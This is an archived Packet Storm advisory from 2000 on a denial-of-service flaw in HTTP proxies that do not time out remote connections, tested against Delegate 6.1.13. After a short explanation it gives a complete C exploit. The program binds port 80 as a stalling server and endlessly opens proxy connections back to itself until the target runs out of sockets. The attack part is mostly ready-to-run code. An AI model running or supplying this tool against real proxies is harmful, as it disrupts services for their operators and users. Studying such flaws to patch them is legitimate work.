exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

proxy.dos

proxy.dos
Posted Aug 2, 2000
Authored by Sectorx | Site xorteam.cjb.net

Many HTTP proxies are vulnerable to a denial of service attack because they do not timeout connections to a remote host, causing the proxy to run out of available sockets and start refusing connections. Tested against Delegate 6.1.13. Exploit code included.

tags | exploit, remote, web, denial of service
SHA-256 | a9552173fc6e379e7810ac0699fb84188c3ccbf628f94952e2b66c5ae4c71603

proxy.dos

Change Mirror Download
HTTP Proxies Denial of Service
by SectorX of XOR (http://xorteam.cjb.net)

The theory
==========
While browsing through my own http proxy code, i noticed an interesting
coding mistake - the proxy did not perfrom timeout checking on the remote host
the user was connecting to. since every time a user requests a file the proxy
spawns him a process, i figured this could be used for a nice fork() attack,
or make the proxy run out of available sockets.

I tested it against delegate 6.1.13, it created some system lag and then
ran out of free sockets, and couldnt accept anymore connections.
I _assume_ this makes alot of http proxies vulnerable, since this seems
like a common mistake.

Exploit
=======
This code acts as a webserver and a proxy client. it binds port 80 and sets
listen() to keep ALOT of connections holding, then connects to the target
proxy and starts spawning connections to its fake httpd, thus creating alot of
stalled child processes.

this was coded in a rush so dont mind its uglyness =p


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <time.h>
#include <sys/time.h>

int Connect(int ip, int port)
{
int fd;
struct sockaddr_in tgt;

fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (fd<0) return -1;
memset(&tgt,0,sizeof(struct sockaddr_in));
tgt.sin_port = htons(port);
tgt.sin_family = AF_INET;
tgt.sin_addr.s_addr = ip;
if (connect(fd,(struct sockaddr*)&tgt,sizeof(struct sockaddr))<0) return -1;
return fd;
}

int sprint(int fd, const char *str,...)
{
va_list args;
char buf[4096];
memset(&buf,0,sizeof(buf));
va_start(args,str);
vsnprintf(buf,sizeof(buf),str,args);
return(write(fd,buf,strlen(buf)));
}

int main(int argc, char *argv[])
{
int fd;
struct sockaddr_in box;

fprintf(stderr, "Many http proxies denial of service (c) sectorx of xor [public]\n");
if (argc < 3) {
fprintf(stderr, "usage: %s <your ip> <proxy ip> [proxy port]\n",argv[0]);
return;
}

fprintf(stderr,"Making a stall on port 80 ... ");
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (fd<0) {
perror("socket() ");
return;
}
memset(&box,0,sizeof(struct sockaddr_in));
box.sin_family = AF_INET;
box.sin_addr.s_addr = INADDR_ANY;
box.sin_port = htons(0x50);
if (bind(fd,(struct sockaddr*)&box,sizeof(struct sockaddr))<0) {
perror("bind()[80] ");
return;
}
if (listen(fd,65535)<0) {
perror("listen() ");
return;
}
fprintf(stderr,"done!\n");
fprintf(stderr,"Attacking proxy : ");
for (;;) {
int sock;

sock = Connect(inet_addr(argv[2]),(argc>3)?(atoi(argv[3])):3128);
if (sock<0) {
perror("Connect() ");
sleep(15);
continue;
}
sprint(sock,"GET http://%s/ HTTP/1.0\n\n",argv[1]);
fprintf(stderr, ".");
}
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close